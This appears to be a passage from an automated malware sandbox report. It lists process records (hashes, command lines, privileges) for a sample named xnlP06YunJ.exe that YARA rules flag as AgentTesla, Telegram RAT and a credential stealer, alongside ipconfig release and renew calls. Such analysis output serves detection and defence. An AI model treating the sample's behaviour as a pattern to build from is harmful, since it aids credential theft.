                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:16:50:33
                                                                              Start date:07/03/2025
                                                                              Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:ipconfig /release
                                                                              Imagebase:0xc00000
                                                                              File size:29'184 bytes
                                                                              MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:16:51:00
                                                                              Start date:07/03/2025
                                                                              Path:C:\Users\user\Desktop\xnlP06YunJ.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\xnlP06YunJ.exe"
                                                                              Imagebase:0x2d0000
                                                                              File size:1'971'616 bytes
                                                                              MD5 hash:A76F2B7C0390E364909268037328A880
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2109400212.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2109400212.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2109400212.0000000002887000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2109400212.0000000002887000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2109400212.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:5
                                                                              Start time:16:51:00
                                                                              Start date:07/03/2025
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                                              Imagebase:0x460000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:16:51:00
                                                                              Start date:07/03/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff642da0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:16:51:00
                                                                              Start date:07/03/2025
                                                                              Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:ipconfig /renew
                                                                              Imagebase:0xc00000
                                                                              File size:29'184 bytes
                                                                              MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >